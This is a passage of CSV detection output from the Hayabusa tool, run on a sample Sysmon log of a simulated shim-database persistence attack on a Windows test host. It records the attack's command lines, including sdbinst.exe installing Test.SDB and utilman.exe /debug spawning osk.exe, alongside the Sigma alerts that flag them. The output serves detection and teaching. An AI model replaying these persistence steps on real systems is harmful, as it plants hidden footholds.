Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 